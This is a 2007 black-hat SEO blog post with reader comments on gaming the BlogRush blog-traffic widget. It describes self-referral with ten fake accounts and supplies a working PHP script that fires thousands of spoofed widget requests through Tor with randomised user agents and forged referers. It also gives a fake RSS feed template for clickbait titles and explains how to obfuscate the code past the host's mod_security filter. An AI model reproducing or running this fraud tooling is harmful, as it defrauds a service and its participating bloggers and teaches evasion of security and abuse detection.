Unless you have been living under a stone, you’ve already heard about ShoeMoney’s BlogRush.

To keep things short, I also believe it will fail: when John Chow is getting a 0.3 Click Rate now, imagine when all blogers start developing ad blindness to that clumsy box.

Besides that it is also not getting much karma due to the fact that it is clearly a benefit the rich and powerful tool.

We can, however, turn it into a great Black Hat tool to promote your nearly bought mfa domain.

Here’s how to do it:

Faking referals

One thing that immediately called my attention was the fact you were giving credits to your referrals, as far as the 10th generation. So, why not be greedy and keep these credits for yourself? Yes, it is possible. Just register 10 accounts and refer yourself from each one each time, from the first one till the 10th one.

Faking traffic

Now we need traffic. Just run this code for a couple of minutes and watch the magic happen:

<?php
// BlackHatDomainer.com //

$ref = 'http://www.site.com/'; //your site
$id = 12345678; //your blogrush id
for( $i = 0; $i < 5000; $i++ ) {
echo $i.'-';
$s = substr( rand().rand(), 0, 16 );
$url = 'http://widget.blogrush.com/box.php?f='.$id.'&url='.urlencode( $ref ).'&ref=&r=0.'.$s;
$fun = tor_tunnel($ref,$url);
echo $fun."\r\n";
}

function tor_tunnel($ref,$url){
$useragent = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
$os = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
$agent = $useragent[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$os[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';
$torad = '127.0.0.1:8118';
$timeout = '300';

$go = curl_init();
curl_setopt ($go, CURLOPT_PROXY, $torad);
curl_setopt ($go, CURLOPT_URL, $url);
curl_setopt ($go, CURLOPT_HEADER, 1);
curl_setopt ($go, CURLOPT_USERAGENT, $agent);
curl_setopt ($go, CURLOPT_REFERER, $ref);
curl_setopt ($go, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($go, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($go, CURLOPT_TIMEOUT, $timeout);
curl_setopt ($go, CURLOPT_CONNECTTIMEOUT, 100);
curl_setopt ($go, CURLOPT_COOKIEJAR, "cookie.txt");
curl_setopt ($go, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($go, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt ($go, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt ($go, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);

$syn = curl_ex*ec($go);
curl_close($go);
return $syn;
}

?>

Notice how I use random OS and USERAGENT codes. Also, forget proxies, this code is using TOR!

Note: You will need Tor, Privoxy and PHP with CURL. In case you have only PHP use fileopen and a list of proxies, or no proxy at all. It will work fine, lol.

Note2:Also remove the * on “curl_ex*ec”. I can’t write c u r l _ e x e c in here or I’ll get a 503 from my host company watchdog mod_security script! :S

Faking posts

Finally, we need clicks! That’s easy; you just have to fake your post titles. Here’s how to do it: just fake an RSS channel.

<?xml version="1.0" encoding="ISO-8859-1" ?>
<rss version="2.0">
<channel>
<title>Your site</title>
<link>http://www.site.com</link>
<description>Your description</description>
<language>en-us</language>

<item>
<category>BlogRush</category>
<title>Your FAKE title!</title>
<link>http://www.site.com/your_real_link</link>
</item>
</channel>
</rss>

Save the above as www.yoursite.com/site.rss and direct BlogRush there.

Acknowledgments: Thanks go to Blackhat’s Diary for easing my task (I didn’t had to sniff http requests to find the url and parameters to pass) and also for John Chow for the idea of a custom rss, although he made it the whitish way and didn’t cloaked the urls.

Update: Blackhat’s Diary dude, what a bad temper you got! I got only the URL from your code and, besides that, my agent/os random function is 10000 times better than yours. Also, 99% of people out there have CURL and NO file_get_contents.

Update (04Oct07): CURL code updated.

Commentary

  1. Paul wrote on 20. Sep 2007

    Does this method create hits from multiple ips?

  2. k wrote on 20. Sep 2007

    Yes, it will create hits from multiple IPs.

  3. David Hopkins wrote on 20. Sep 2007

    Nice script :)

    Stumbled.

  4. Paul wrote on 23. Sep 2007

    Hi, i got tor and privoxy setup but i dont think im using it right. Its only changing ip every 10 minutes or so, not on every request. I connecting to 127.0.0.1:8118 which i think is the privoxy port? I tried connecting to the tor one which is 9051 for me but get connection refused. I suppose the problem is i dont really understand what these programs are doing :) (btw i think this could have alot more applications than just blogrush if setup right)

  5. curl_exec wrote on 24. Sep 2007

    I had to see what happens if I put curl_exec in the comments

  6. bigdadgib wrote on 31. Oct 2007

    what is curl_exec anyway?

  7. SlightlyShadySEO wrote on 02. Dec 2007

    curl_exec EXECutes the CURL query you setup…

  8. eliena andrews wrote on 03. Dec 2007

    that was cool exploit, for blogrush. Have they patched their system for this ?

    Eliena

  1. exploiting blogrush - WickedFire - Affiliate Marketing Forum - Internet Marketing Webmaster SEO Forum on 19. Sep 2007
  2. Net Frontier Marketing » Blog Rush: 3 Fatal Reasons to Nuke it Right Now on 20. Sep 2007
  3. Blog Rush - Just another pyramid » SiteLogic Web Development on 20. Sep 2007
  4. Betshopboy.net » The Week In Review (16/9 - 22/9) on 22. Sep 2007
  5. BlogRush Getting The Press It Deserves - Internet Marketing Sucks! on 23. Sep 2007
  6. Exploit, Hack & Take Down BlogRush for Fun & Profit on 24. Sep 2007

Leave a reply